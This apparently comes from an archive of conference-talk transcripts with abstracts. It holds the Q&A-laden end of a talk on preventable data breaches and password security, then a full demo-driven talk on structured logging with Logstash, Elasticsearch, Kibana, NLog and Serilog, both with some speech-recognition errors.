things like the keychains that get synced across your Apple devices, because that's also very convenient. And basically, just taking over people's lives, or as Matt Honen said, basically destroyed their digital world. So an enormous amount of potential for hackers. Now, the ransom one is a bit interesting too. Clearly, that did possibly give the attacker opportunities to do other things, but ransoms are this sort of other class of software we're seeing. Often seen called ransomware. Things like crypto lockers in the news a lot at the moment, where attackers will get more wear onto PCs, generally do a pretty good job of encrypting all their data, and then say, look, if you want to decrypt it, you've got to send me $200. So ransoms are becoming a thing. But from Apple's side as well, you do have to wonder, just how many devices should someone be able to lock with a message from Oleg Plyst demanding a ransom before Apple go, maybe this shouldn't happen? Now, I know that they're massive, and they have all sorts of resets and things go on, but this is a sort of fraud pattern that they probably should be detecting. And the question for you guys is in your apps, where there are critical functions, things like being able to take over people's devices, maybe just knowing your username and password isn't really enough to let people do that. So wrapping up, there are a few things here that were really common patterns across the whole thing. And one of them is, is that all of these risks are really well known. They're really well documented. Heaps of free material out there, heaps of stuff like my PluralSight courses, I've got free ebook on Troyhunt.com, numerous blog posts, all of this stuff is known by many security professionals, known by many developers as well. So a lot of this is not new, yet we keep building vulnerable apps. A clearly interlinked accounts is another biggie. So we keep having problems where we create these interdependencies between accounts. And I think almost as a consumer, the thing we've got to think about is do we really want to allow this account to be reset by that one? Or should you be able to authenticate over there and do something over there? Convenient, yes. Secure, yeah, can have issues. We've seen some very bad humans throughout this process. Humans are notoriously bad at security. And I mentioned social engineering is one of the biggest risks that we have. Computers are very good at doing what they're told to do. Sometimes they're not told to do the right thing, which is another issue altogether. But certainly they are more predictable in this way than humans. So don't forget the social engineering aspect. And finally, it does come back to us as the devs. So what sort of training are we getting to understand these risks? For those of us managing teams or delivering on behalf of organizations, what sort of processes do we have around penetration testing? Even automated scans. So he put tools out there. You can just point at a website, it'll come back and say here's 50 things that are wrong with it. So there are very easy ways to do it, but we as developers have got to take some responsibility for it. So with that, thank you very much. I did refer a number of times to Friday where I am going to do demos and show things to get broken. And because I'm in Norway and a lot of people said I should do this in Norway, we're also going to look at Pony Swedish websites, which I believe is quite popular. Thank you very much. Thank you very much. Thank you very much. Thank you very much. Thank you very much. Thank you very much. Thank you very much. Thank you very much. Any question time? Couple of minutes, any questions? Over here. Can you pass the response after the class? You don't need that. I don't have any. Do you have any vulnerability? All right, so the question is about password managers. And the gentleman mentioned key pass. Key pass is one, last pass is another. I use one password. Do they have any vulnerabilities? Probably, do I know of any no? I think password managers are about the best mouse trap we have for managing passwords. Because if we want to be strong, so it has to be long and random and all these sort of things, and we want to be unique, we've only got so much memory mass to be able to do that. So we certainly can't do that across the breadth of accounts, particularly people here probably have, because we create so many accounts online. So I personally feel that the best balance is to get a good password manager, last pass, key pass, one password, and use that as much as you possibly can. Any other questions? Nope. Okay, well, do remember, oh, up there, sorry, you're behind the light. Ah, good question. So what is the hashing algorithm in the SQL membership provider? So it depends on the version of ASP.NET. So the one that we're going to break on Friday is the ASP.NET implementation that you would get with the Visual Studio 2010 project, which gave you one round of SHA-1 with Assault, which is totally useless, and we will hack that at a rate of 10 million passwords a second on Friday. And that's slow, because it's on this. We can do $4 billion at home on a good machine. Newer versions have different implementations. I think the latest one is doing a thousand rounds of PDKDF2 with SHA-512. So even that, by many people, is viewed to be insecure. So the short answer is it's getting better, but go back a few years, and it was very bad by today's standards. Anybody else? Okay, look if everyone could fill out the evals on the way as well. We'll do a... That's the green card on the end. Don't worry about those. Thank you very much, everyone. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you.
Is it just me, or are we seeing more online attacks leaking more data year by year? Actually it’s not just me because the statistics are there to prove it. In fact the largest online breach we’ve seen to date was less than six months ago when Adobe became the victim of a 152 million record attack. A couple of months later and Target saw 110 million credit cards stolen making it the largest theft of financial data ever. In fact all told, we’re looking at in the order of over 822 million records gone missing in 2013 alone. The thing is though, when we look back at recent attacks with the clarity of hindsight, they’re almost always easily preventable. Somewhere, somehow, someone had a major oversight in their code – or often many major oversights – that somehow slipped through the cracks, made its way into a production system and was consequently pounced on by someone with malicious intent. In this session we’re going to look through 10 examples of online attacks that should never have happened. Sometimes it’s a single easily preventable flaws in code, sometimes it’s social engineering of people with access to valuable data and other times it’s a chaining of individual risks knitted together in order to compromise the target. We’re going to systematically work through each of these 10 attacks, understand what went wrong and then assess how each system could have been built to be resilient to the attack. The lessons learned in this webinar are intended to help you better secure your systems by learning from the mistakes of those who have gone before you.
10.5446/50648 (DOI)
Good afternoon. Hopefully you had a good lunch. I guess our main task now is to keep you awake for the next hour. We'll try our best. My name is Vider Kongsley, with me is my colleague, Tushlan Nikolaessen, and we're here to talk about monitoring your application using Log Station Elasticsearch. We want to keep this an interactive session, so please ask questions underway and shout if I don't see you. So, you might have noticed that we added the subheader logging for IT hipsters, and that's purely because we are so desperately wanting to be hip. I mean, so this is the best we got. So you have to decide if you're a hip or not. Now, seriously, we're here to talk about log aggregation, and our company is publishing what we call a technology radar, where we give our customers some advice on what technologies and what techniques to use, to stop use, and consider using. Log aggregation is something that we believe in, and something that we think that you should try out, or at least consider. That's great. PowerPoint has stopped working. Nice start. Restarting. And it lost that document. Let's see. If we can get this up and running. Okay, thank you, PowerPoint. We're back. So, we're here to talk about log aggregation, but first of all, let me just tell you a little bit about my own experience. You know, back in the day, I, when I wrote a program, I would now and then insert some log statements into my code just to see what's going on, maybe ask them an alternative to do debugging in Visual Studio. And I didn't really have a broader picture on why I did logging. And, but when the code shipped, I kept the log statements in there, hoping that they would be useful. At least that was best practice. They should be kept in there. Now and then, when there was a problem in production, some operations guys asked us for advice, and we would tell them to go and look in the application log. But what did I find? Gibberish. Just pure white noise. Nothing that they could even comprehend. So, the problem was not that the data wasn't there, but it was not available. It was not, the context was different. Maybe the information was somewhere there, but they couldn't find it. So, the main takeaway that we are hoping to give you today is that you should add some structure to your logs. And we are going to show you a few techniques on how to do that, a few tools, and a little bit of advice on the road, for the road. So, our presentations are split up in three main topics. First, I'm going to walk through a very common scenario using tools like Kibana, Elastic Search and LogStash. Then, Torshtain is going to give you the application or the developer's view on how to improve the logging in your application. And finally, we are going to give a few notes on the architecture of the log setup, how you can add reliability, how you can add scalability to your log setup. So, to do that, we are going to have a website site as a case. This is our company's blog. It is an ASP.NET application. It runs on websites in Microsoft Azure. And the logs that we get out are the IIS access logs. So, we are going to go through a scenario where we have a look at those. The first tool that we are going to look at is Kibana. And by the way, it's not Katana. It's not Cortana, but it's Kibana. So, I know I'm going to get that wrong during the talk, so please let me know when I do. Kibana is a data visualization tool that can be used to visualize data in Elasticsearch. So, it's not just for logging. So, it's basically a JavaScript application, pure JavaScript application. So, let's have a look at how that, what that looks like. So, this is the main view that we get. And what you see here in the graph is what is called events or basically requests to the web server. So, over time. So, on the x-axis we have time. On the y-axis we have the number of requests during, in a unit of time. So, what I can do here is I can go and change my time span. And we have the logs. I can go here and zoom into a specific time interval. And if I scroll down, I find more information about the data that I have in the log. So, each row here is a separate request to the web server. On the left here you see that I have a number of fields that I can filter or I can add. I can add fields to the table. If I click on a row, I get the whole, the entire data set for that particular event. So, we're going to get back to what they feel. We're going to look into the fields in a moment. So, what I can do here is I can also try to query this data. I can create a simple query just to know the user's platform, for instance. So, if we try Windows, what we all know and love. And then I can add another piece of information for this raincoat thing, Macintosh. And you can see that the bars are added on top of each other. So, what's the third thingy? Line mix. So, the idea is that we have a general tool where we can dive into the data and have different views on the data. So that was the Kibana part. And the demo I just showed you. Good. And the next tool that we're going to look into is Elasticsearch. Elasticsearch is a general search utility. It's very scalable. It runs on something called a Java virtual machine, you know. You have heard of this. But don't worry, you don't have to learn Java. It has a REST API. So, almost at all times, you interact through the web API. So, I was just kidding. I love Java. It's great. So, but being a REST API, one of the things that you can do, you can talk to it from a browser. Here is a Chrome plug-in called Sense, which gives you some kind of a dashboard where you can query the LogStash server. And you can get a few hints and suggestions on what you can do with it. You can do searches from here and stuff like that. Another way to interact with Elasticsearch is through plugins. There are a number of good plugins out there. And this one, this particular one is called COPF. It gives us a few, a good overview, kind of an operations overview of what's in the server. So, on the top row here, you have some information. It says that there is one node in the cluster. Elasticsearch is a clustered server. In this case, there are 116 indices. There are over a thousand shards constituting over a million documents. And what you see in the table here is that, is, are the shards. On the left there, there's, no, sorry, it's not the shards, it's the indexes. And on the left there, you have something called Kibana int. I'm going to get back to that. But the main ones here are the one named LogStash and a date. So, we have here one index per date of our data. So, the green squares constitute the shards. So the indices are split into shards. And if you have more than one node in the cluster, the shards are distributed on the nodes in the cluster. So, there is also a REST interface here in this plug-in where you can play with making requests to the server and stuff like that pretty much like you do in sense. So, that's also very nice. The third tool that we are going to look at is LogStash. And its main purpose is basically shuffling the data back and forth. So, it picks up the data from one, for a number, from a number of sources, then it does transformations, it can enrich the data, and then it outputs it somewhere else. So, that's the main purpose. And also, this is also a Java-based application. But again, you don't have to learn Java because the plug-ins are written in Ruby. So, don't be afraid. Or maybe you should be afraid. I don't know. So, the main concept in LogStash is the processing pipeline. And the pipeline is built up from three categories of plug-ins. You have the inputs which gets data from somewhere. You have the filters which transform the data. And you have the outputs that writes the data somewhere else. So, typically here, you can have a number of inputs. It can be access logs. It can be the Windows event logs. It can be your application logs. Then you process it in the pipeline. And then you have output it to somewhere else. So, let's have a look at our setup. The input, in this scenario, we use a file input. It basically transforms traverses the file system looking for log files. It has a few options where we give it a path to look for the logs. And where it should put the so-called SINs database. And that's basically where it keeps its state. So, if it restarts, then it doesn't, you know, look through all the files again. It starts from where it left off. The next thing we are going to look at is the filter. This particular filter is called grok. If you have done compiler techniques or something like that, at least during your studies, you're familiar with a lexical analysis analyzer. And you can think of this as a lexical analyzer where we have a number of well-defined tokens or token types. So, here we have a timestamp format. And here we say what should be the name of that property in our results. So this is a pretty big thing. Like I said, in this case, we are parsing IIS logs. And if you can, if you've never seen such a log, you can have a look here. All the log files start with a header, and then each request to the web server creates one line. And this is a pretty ugly format if you want to parse it. So it's even worse than you see here on the screen because tabs and spaces have different meanings. So that's pretty awful. And as an extra bonus, it changes between IIS versions. So if you got it right, then an upgrade, then you can be in trouble. So, but here again, you do some trial and error, and then you arrive at something like this that tends to work. And what you get out is this. Just a JSON object with a number of fields. So you can probably recognize some of the properties here as the token definitions that we had earlier on. But the main topic here is that we get JSON out, and that's a well-structured format. So, but if we can do this more in the pipeline, here the GUIP filter tries to pick up the IP address of the client and add geolocation information from that. It has a database of well-known IP addresses. So one interesting thing you can do there when you enrich the data like this. Let me just show you here. I have cheated a little bit, and I have a definition here where I can then have like a heat map of the requests. So if I change the view here, the time span, then the map is updated with where our visitors come from. So this is things that you can do when you enrich your log data with the log-plugins. So that's pretty neat. Okay. And the second filter actually matches the, or parses the datetime value into something useful for elastic search because like you see here, there is a timestamp. We give it a format, and then we tell them that this is actually UTC time, and then we can use that time to display the event in the graph. Again, this is transformation of the data in the processing pipeline. So when that is done, we can write our logs to elastic search. In this case, we are using the REST API over the HTTP protocol, and we output the data. So let's put these three things together. We have our logs. In our case, the IIS logs, we get them into LogStash, Enrich and Transform, and then we store them as JSON objects in elastic search. And there they are available for the Kibana server, the Kibana user interface to view to us. So that's a pretty good setup. We're pretty happy with that. Or are we? Maybe we can improve this. Thursten, do you have any idea? Yeah, I got some ideas. Can you hear me? Let's think about, yeah, we can, though. So let's think about what we're doing. We're taking structured data. We then store it as unstructured data in textual log files, and then we try to parse it back into structured data. There's something that's not right here. The thing we have to think about is, can we do something better? And in the case that we just show where we get access logs from IIS, we can't do anything because it's a third party that are generating the logs for us. We don't own it or can't control it. So then LogStash is a helping tool for that specific scenario. But when we own the system or have our own applications that we control the source code for, we can actually start improving this. And instead of logging files to files or to a very strict database format, you can actually start storing it as structured data, as JSON documents or whatever. And so what I'm going to kind of make you think about is, how can we do this in an existing application? So let's pretend that we have an existing application that you own that spits out megabytes of logs every hour, and it stores them in text files. What we could do is, we could add a little extension to your already existing application that already logs to files or database, and we can extend it so that it logs to N log, no, sorry, that it logs to Elasticsearch instead. So what we can make it do, we can make the log extension, pick up the log event that normally goes into the file, but also send it to Elasticsearch as well. And then you can start viewing it in Kibana as we just showed you. And the reason for this is that there are two things that you have to think about here. The first thing is that some organizations might have reservations about introducing this system in their production environment, and by doing this, you can safely just start introducing it and trying it out without changing anything of the existing solution. And you also get to keep all your existing logs the way there are, so those, if operations have to have it in text files, they will still have them in text files, but if you are going to debug the system, you can go into Kibana. So this is just a way to kind of introduce it in your existing system without going all in. So I'm going to do a code demo for you. Just have to log in. Lovely picture, I know it. Let's try to get the password right. Yay! All right. So right here, I got what kind of simulates your existing app. This is a standard out-of-the-box ASP MVC template application. The only thing I've done to this is add nlog and also create some logging in different controllers just to get some output. And this already logs to a file and to the console. And it doesn't matter that it's nlog, it could still use log for net or any other logging solution. I just like nlog, so I'm just showing you an extension for that. So I have to go to the correct git branch. So, reload. And I already got one component in place already. That's just a thing that does a asynchronous post call to elastic search to sort of data. There is some nasty error handling here. Don't ask about it, but you can check out this code later on GitHub if you want to. So what we're going to start out with is to take something that can take a log event from nlog and transform it into JSON object. So I'm going to create a JSON dump layout renderer. That's a concept, layout renderer is a concept in nlog. So I got some skeleton code here. I'm going to show you. So we have some things we have to add in order to nlog to pick it up. We have the name of the layout, and we have something that appends the log to some source. And what you have to do, we have to create, write the code that actually takes the log event and transforms to JSON. And I've got some code for that that I'm going to walk you through now. So the first thing is that we have a dynamic object here. This is very useful in this case because we don't have a schema. We don't have a structured database. We have a schema less JSON document that we can add any property that we want. So in this case, I'm just mapping over the level from the log event and the log name. And then I have a little hack here. The reason for this hack is that I want to have this at sign at the time stamp. And the reason for that is that I wanted to work out of the box with the logstash format, which then in turn works out of the box with Kibana. So by doing this, I don't have to modify any settings in Kibana. It will just work when I start pushing data in. And the other thing, this is just a helpful hint. Try always to use UTC time on your log data. So you normalize them when you put them in. That will help you a lot when you want to visualize them. So this next part is just getting different properties and story names. Like getting the identity, machine name, Windows identity, the thread ID and process ID. These are useful properties that you probably wouldn't put in a text file because it takes too much space or it's difficult to know which property is the thread ID and which is the process ID. But here we have a structure. So we give each property a name. So you can easily figure out what it is. And I'm using built-in N log tools here to get these data. So I don't have to write it myself. Again, this is something you can customize and adapt to log for net or any other tool. So the last thing I do here is if there's an exception, I add some data for that as well. And again, I'm using the dynamic type. And I get the name of the type, the message, and the sectorize and some other data. I just want to show you one thing before I go on. I just want to show you how this actually looks before I add the configuration to the log. So here I have the application. It's wonderful. And if you look at the console here, we have some log statement. And it actually logs when I click around here. I actually can make an exception if I want to. So we have existing logging here that both logs to the console and as well to a file folder here. So I got this both in the text file and in the console. Just wanted to show you that before I hook in the elastic search part. Now, so now we have something that actually takes log event and outputs JSON. The next thing I have to make is the target. That is just the name in N log that means somewhere we store the data in or the log event in. So I'm going to make an elastic search target. And again, I have some skeleton code. We give it a name. We have a base class that we get a lot or that makes it work with N log. And I'm going to have one parameter on this extension or target, which is the URL to N log. No, sorry, to elastic search. And we have a hard coded layout because this won't work with any other type of layout than the one we just created. So we have to do some logic when we write. And what we're basically going to try to do is send it to elastic search. And if it fails, we're going to handle the error gracefully. And the logic behind sending it to elastic search is pretty simple. All you have to do is render the JSON thing. So I'm sending in the log event here and it will actually put it into this JSON dump layer to renderer, which then we'll just pick out the properties and return a string with JSON right here. I also have this, there is some logic for rendering the URI here. So we have to do that. So again, this is the parameter in. This will contain a date time that is dynamic. So it has to render it and it just return a URI type. And the next thing here is just setting up the web client and making an asynchronous post call here. Again, the way this is written is to make it fault tolerant. So if I stop elastic search, you won't get any exception or any errors in the application. It just won't log anything. So it's pretty fault tolerant. So now we have both something that, now we just created something that can connect to elastic search and put the JSON in there. Again, this is the simple rest interface. There's no library here. This is the HTTP post call over to elastic search. No magic. So the last thing we have to do in order to make this work is extend the existing configuration. So here you see the file and debugger view that I showed you. So the first thing you have to do in this configuration is tell nlog that we have an extension. And we just say which assembly contains the extension. And in this case, it's the assembly I'm working in right now. So the next thing is to add the target. Like you see, I'm giving it the name of this elastic search target. And I'm giving it the URL. I have it on localhost. I'm using default log-format for the index here. That is, again, to make it work out of the box with Kibana. And I'm just giving it a name of the log source. In this case, it's my application. So the last thing I have to do in this file is just tell it to write everything in this log or that is log to elastic search. So that's it. So if I run up this application right now, I should actually be able to see the log events in Kibana. So let's see what we got here. I have to refresh this. And voila, we have some log data here. So now you can see that the thing that we only saw in the console I have here. But I can just click around to get some more log statements. So I'm just going to click like so, make it crash. So now we see that we get more and more errors. And what you can notice here is that I can customize these views. I can make my own kind of dashboard here. Again, Kibana is extremely configurable. You can make it suit your own needs and make your own dashboards. Again, if you click on this error here, I have logged the exception. No, sorry. Here's the exception. So again, if I just want to show you the JSON behind this, you can see all the properties here that I added. And then you also see that the error details here is another sub-document. So it's structured. So I can search now. I'm just going to show you something here. If I make it crash two times, just refresh this. I can search for all the messages that has an error or exception. Exists exception. I have a sex file here. Cheat. Cheat. So let's try this out. Of course, the demo goes. It's not with me today. Or they are. Okay. That did not work. Sorry. It's not an exception, of course. Good thing. It's, what did I call it? Error details in this case. No, it's case sensitive. Error details. All right. So again, this is Lucene and elastic search working together to give me a powerful query syntax where I can find exactly what I'm looking for. And you most likely couldn't do this in a text file. At least not this simple. So this is, again, I have structured data. I can also filter if I remove this. Right here. I can actually just show, for instance, the info messages by adding a filter. So right here, I'm just showing the info messages. And it's really neat. So that was the first demo. All right. So I just talked about nlog and extending an existing application that you kind of, that already had logging set up. And I also now want to introduce serilog, which is a new logging framework that has a fresh take on how to do logging. And the reason I want to introduce this is because it's kind of the second iteration over structured logging. So this takes it one more, one step further. And what it does is it makes it dead simple to add more context into your logs, get more data there, get, and without having to kind of write a lot of code in order to do that. So the framework actually helps you get a lot more context into each log statement. And you can also enrich your logs. It's a concept where you have global properties that, for instance, if you want to have the machine name or application version on every log message in that application, you can use an enricher to get that. I'm going to show you how this works in a demo. And since it's structured data and built around that, it fits really nicely into Elasticsearch. And if you want to, you can even write this to regular files. And one opportunity we have here is that we can, instead of saving it as rendered text, we can actually store the JSON. And if we do that, we can actually use LogStatch later to pull out these logs and put them directly into Elasticsearch. And the reason for doing that is if you have network connectivity issues or you don't trust the network, you can actually use this as a local buffer to just kind of store your logs. So, again, we have another code demo. So, right here, I have a simple finished console application. And we start out with the logging configuration. This is to set up a logger. And we don't have XML here. So, this is kind of the equivalent of setting up log for net or N log in XML. So, we specify the log level. The default is information. So, I had to set it a bit lower. And then you have a concept of syncs. A sync is just a log target for you write the log. So, I set it up to log to a colored console. There are several syncs that come out of the box with the server log. But I also downloaded and added Elasticsearch. So, this is built in. I don't have to make this extension myself like I did in the other demo. And I also used a different index in order to separate the logs from the other demo. And again, if you want to do what I told you with JSON, you can use this syntax right here. All these code is available on GitHub. So, you can look into this later. And then I have the enrichers. Again, I'm just going to show you, for instance, I want, if I want all my logs to have a property, for instance, application version, and I say demo 1.0, then all my properties, all my log statement will have that property. But I also can use other useful properties like I can show you this with machine name. That's useful if you have lots of clients logging. And maybe you want the thread ID. That's also useful. And then you have process ID. So, there's a lot of useful built-in tools, and it's really easy to make extensions to this yourself. So, this is just a log in configuration. So, if I wanted to create a logger for a specific class, I would use this syntax here. So, this kind of, this creates a class-specific logger. So, I'm going to show you how this actually looks, if I manage to start this up, right? So, you see that it now logs to the colored console output. And what's worth noticing here is, you see that I put in a dynamic object here. It does serialize that as a text string here in a JSON-ish format. And if we go to the database, no, sorry, logs, kebana, we will see that we have this same text now as a data row here. And, but what's interesting here is, you see, this contains very little context, very little information. This is what we usually put in a file. But if you look here closely, you can see that we suddenly have a lot more properties here. We have, for instance, the source context. We have the application version, the enricher we saw earlier. We have the machine name. We have the thread ID and process ID. We don't have that in the text log. So, we can continue by, but there's one more thing to notice here. You notice that this line here is kind of a serialized flattened version of the dynamic object. If you don't want to flatten it, if you want to keep the structure, you can look, you can see here, I have an at sign in front of data. What that does is when it store this, again, you see it in the, in the text here, it's flattened. But if you look in the database now on the new entry, you will see that it has actually kept these two as two separate fields. So, I have this presenter and users two different fields. If you look at the JSON again, you'll see here that it's actually an object. So, what I can do now, I can actually add filters saying, okay, give me all the log statements for user, Torshtine, and it will actually only give me those. So, that's one of the great opportunities you get now with this kind of structured logging. And also, it comes with, with good exception handling. So, again, where I wrote the code for mapping the exception over to JSON, JSON, serial log already has done that. So, if I refresh here, I will see again, I have a lot more context here. I have the exception class name and message and I get the stack trace and everything if I want. There is some more things in this demo, but I think I will leave that to you later. There is some concept of log context which can scope one of the enriched properties for just one block of code. So, there is a lot of things here in serial log to help you get more context in your logs without having to clutter your code with a lot of string formatting or whatever. So, what I just showed you was two approaches to handling logging. So, in the case where you already have an existing application which you can't just switch out the logging in, you can add an extension to your existing logging framework. Be it N log or log for net or whatever, you can probably make an extension to it. That just does a H2B code to elastic search. And you can also, if you are making a new application, I would recommend you looking into serial log because it has a new take on how you do logging and it makes it really simple to get the structure and context in there. But there are some architectural things to consider. If you have 800 clients spitting out 500 logs a minute, you might get some issues that I think Vida can help you handle. Okay, sure. So, but just to summarize what Torsche and Naha have shown you, we have seen a little bit simpler architecture where we push things directly into elastic search. But we are working on our mantra today, keep structure on the logs. We have seen that we can enrich the JSON objects with more metadata and more data that are very useful for us to make sense to retrieve the log information. And also we have seen that the logs are aggregated right away. Our application servers write directly to our central location which is the elastic search cluster so we don't have to make an extra step to gather all the data from our application servers. And we have also seen that it is very easy for application to talk to elastic search because it is an HTTP rest-based API. But wait a second. Torsche, have you ever heard of the fallacies of distributed computing? Fallacy of what? So it was something that was formulated around the time you were born. So basically it was formulated by Peter Deutsch, I think in early 90s. Here they are. But I'm more, in this scenario, I'm most concerned with the first one. We assume that the network is reliable. And that could be a problem. If I'm concerned with losing logs, I don't want to lose logs, this approach will not work when the network is down. So to fix that, in that situation, we throw another component into the mix and that is the Redis database. The Redis database is a no-SQL database. It doesn't, the main purpose of it is to temporarily store the data before we move them into elastic search. It's a key value store. Basically what we do is that we add those JSON objects onto a list in Redis and then we have elastic search pulling those from that list asynchronically. It doesn't have to be a Redis. The point is that we need to write the data fast so that the application can get rid of the log data and move on. So what we can then do, we can create an extension in the same manner as Torsten showed you that actually stores those JSON objects in Redis instead of writing directly to elastic search. Then elastic search can come along whenever it's ready, pull that data, do the transforms if it must. As you've seen, it's already JSON so we don't have to parse it, we just have to transform it, enrich it maybe and then push it into elastic search. So we've traded a little bit of simplicity with reliability. What we then can do is that we can easily scale out our application servers. It's still going to be very easy to pull that information into elastic search. But the thing is that we can deploy the Redis database locally on the server so that we don't have to write over the network all the time. So if the network is down, we store it locally and then when the network is up again, LogStash comes along and pulls them into elastic search. We can then even scale out the elastic search infrastructure. We haven't said so much about that but it is a highly scalable search solution so that we can easily scale it if you want to handle more data or have a better real-time view of the data. So I'll get very simple but now we have a distributed solution. So let's try to wrap this up. Once again, try, consider the logging during the entire lifecycle of your application, not just during development, not just during operations, but try to combine it. We have seen tools that can help you aggregate the logs, make them current at all times, make them available and make them visual to you. Use a structured format if you can all the way. Torschein has showed you a situation where you can control your application and how it logs. Then you should aim for a structured format. In this case, we use JSON and that's because all the tools on our pipeline are able to handle that. If you don't, if you cannot do that, if you cannot control the source of your logs, you cannot control IIS. It will always write the log statements to a file, but then you can use LogStash to parse it before you transform and enrich the data. And then finally use Elasticsearch to aggregate the data. And also like Torschein said earlier, no, sorry, you can also store it temporarily locally if you are concerned with losing data. That could be a good idea. So you can throw our technology like Redis into the mix if you want to. And like Torschein said, it's not necessary to go all in. You can build this piece by piece. You can start off with LogStash, parse your access logs, your Windows event logs. Then you can move on, for instance, on your application to add your application logs to the mix. You can even parse the application logs if you cannot touch the application. So do it gradually. And if you get to that point where you actually manage to get your data into Elasticsearch, you open up a whole new set of opportunities. So it's interesting. I've tried this out a bit. And using Kibana, that is a generic visualization tool, you can actually start seeing patterns in your logs. And this is really interesting because in a flat log file, you won't see that you have accumulating errors. You can't see that. What you can see in Kibana is that you can see if you, for instance, split the log into log event groups, so you have a red for error, yellow for warning, et cetera. You can see that the red line will peak up. And then you can actually see that, oh, here we had a lot of errors going on. And then you can zoom into that area. And then you can filter on all the errors. And you can see, hmm, what kind of messages are it? Are error message is coming? Then you can see, oh, it's a database time. Let's look closer to that. And what you can actually start doing, you can start railing down, for instance, distributing it across which service or server is throwing the error. Then you might notice that, oh, it's just one of the free load balance service that is having an issue. And then you probably know that, okay, we have to look into this, what's going on. I'll come back to you in a minute. And you also get kind of the big data approach here. You have a lot of data, and you can actually structure and find out a lot more things about your application because you have the data. You can actually start learning about how your application really works. And then you can take this one step further. And with LogStash, you can actually start taking out performance counters from Windows and adding them into the log as well. So you can kind of monitor CPU usage, memory usage, and also correlate that with log events. For instance, if you have a time-out, maybe the CPU load is really high at that point. So there's a lot of new opportunities. And again, it's not only for logging, you can use it for more. We have some links. We have a short link to all of this in the last slide. And you will also be able to find this presentation online later. We'll tweet the link for you. So there's three things that we want to say now. We're going to stick around here after the session if you want to come and ask us questions. And if you want to catch us later, we'll probably be at Beck booth. That's where you get the nice coffee. And remember to cast a vote when you leave the area. So we will take questions now if there are any. You're first. You're using Kibana's analysis tool. Could you also use it as a monitor tool with thresholds and alerts from live data? So repeat the question. Yes, the question is, can we use Kibana to monitor and throw alerts on certain events? The answer is no. There is a tool that does this today, and it's called Splunk. It's an enterprise log and event tool, which does that. But again, I've actually thought about that scenario and what I was thinking of. If you defined your kind of criteria for what should, for exception, you can use Kibana to get the query it uses to elastic search. And then my idea is that you can just take that query that you made in Kibana, copy it over to new tool that just sends an email or whatever when that query returns a result. So it doesn't do it today, but I think it's really easy to extend it. Maybe I can show it. Yeah, you can show it. Just real quick. Sorry. Okay. Vida first. Can show the query inspection. Just one second. So what you basically can do is that you can repeat whatever query Kibana makes to elastic search. So if you look at the inspect, can you all see that? It's an inspect icon, and then you can have like a curl command that could repeat that query. And you can just copy and paste that into any tool that monitors that query. So, yeah. Why do you use Redis instead of a message bus or like for example, RabbitMQ when this was an obvious message going out? No, no. Like I said, it's just a random tool. You can use pretty much anything you want. The thing with Redis is the simplicity of the setup. So like I said, if you want to deploy that locally on the application server, it's really easy to package that and run that locally. And also, it's very fast to write to. So you kind of push away the log as soon as possible so that the application can do whatever it wants. I'm sure there are many technologies that could do that. Redis is just one of them. So the question is if we can get access in C-sharp code to the event logs, is that a question or a performance? Yeah. Yeah. If I was starting a new application, I would probably try out Serialog. I've done some experimentation with it and it fits really nicely into this kind of context and structured logging. It's the way they let you kind of forward structured data into the logs is really simple. And in, for instance, N log and log for net, you have the string format syntax. And I think that results in a lot of noise. And it's also difficult to get kind of contextual context for, for instance, if you have an iteration of a lot of objects, you might want to have a property on all the log statements within that context, which is, for instance, which user it's doing things for. Did that answer your question? Also related question. And then if you use the elastic search thing as you showed, then you can bypass logstash. Yes. If you, yes, that's a, that's a gain you get. So you don't have to log, have logstash if you use Serialog with the elastic search thing. So that's one, one piece less in the architecture. If you did both of them, you actually pushed it directly, but also logged in while. And then there was a network, you know, transient outage and you said, okay, now logstash process is, would you get duplicate events? So the question is, if I have a log both to file and elastic search and there's network outage and I want to recover, kind of get the data from the file into elastic search, will I get duplicate events? Yes, you will, unless you actually try to figure out if it's already present. So there's no finished solution for that. But again, a little bit of PowerShell magic and I think you'll do okay. How fast is the data available in elastic search? Could you use it in real time? So the question was how fast the data is available in elastic search and if you can use it in real time. And I believe it's very fast. So it's very good for a real time solution. Like, but of course, if you do this intermediate step in logstash, there might be a few extra seconds of lag. But if you write directly to the elastic search, it's pretty much instant. There's no flush for one second. So it's near real time. Yeah. For searches and for gets it's real time. Okay, so we have some extra information around the second until it's available. So that's pretty good. More questions? Yeah. Yeah. So the question was if you have, we have looked into correlation information so that if you have logs for from IIS and from application logs, you can, you know, correlate them. This is something that you can do, but that's custom code, I think. The metadata that you could add on from the application, you can certainly have like a correlation ID per request that you can use to follow the requests. If there are any tools for that, for instance, in IIS, I don't know. I have, you just reminded me on a point I wanted to make. There are, like I said, when you already have context logging in your application or logging with context, there are some low hanging fruits here. And if you have a system, complex system and lots of applications, there are lots of services running, and you want to correlate a lot of events or log events that goes from, let's say you have a end web page that the end user use, and you want to track what all the log message from he clicks by until it's kind of finished up and done all the things. And let's say that this infrastructure consists of VCF services, you have HTTP REST services, and you have service pass. I've tried out adding kind of a correlation ID throughout all of these requests going all around the system. And what this means is that you can actually follow, like a red line, all the things that happened from that one click and see all the logs and all the exceptions that might have happened on this trip around your system. And that is something you can do really easily when you have data in Elastic Search. All you have to do is just search for that correlation ID in Kibana, and all the logs, let's say 50 log statements that are related to that one action will be available. You can also extend this a lot, but it's just something to think about. It's a low hanging fruit that you can actually just pick and start trying out in your application. Just a helpful warning, extending VCF is probably not something you want to do, but I'm probably going to release a set of extension plugins on GitHub later. That actually does the boiler plate for you, so you can actually just pick the component and add it to our application. So any more questions? You're doing the same, interesting. The timeframe is unknown. But again, I have some finished code that actually is working now, but I haven't done quality check on it, and I'm worried about the thread safety of my code. And so I have to learn more about how VCF works before I can release this. I can release it, of course, and get patches, but I want to do quality assurance on it before I release it. All right. Okay. Then thank you. Have a nice party tonight.
Developers, it’s time to stop for a moment and think about logging in your application! Too often, we are neglecting this topic – and someone is paying the price. We’re seeing DevOps gaining grounds, and we’re seeing more complex deployments in the cloud. This makes it necessary for us to consider logging and monitoring, but it also opens up new possibilities. This talk will introduce you to ElasticSearch and LogStash, two emerging products gaining traction that can take logging to the next level. We'll show you how to use them in various scenarios and explain what it solves for you. We'll show how to gather and display real-time logging information from your .NET applications and Windows installations. The talk is hands-on and will feature a lot of demos.
10.5446/50638 (DOI)
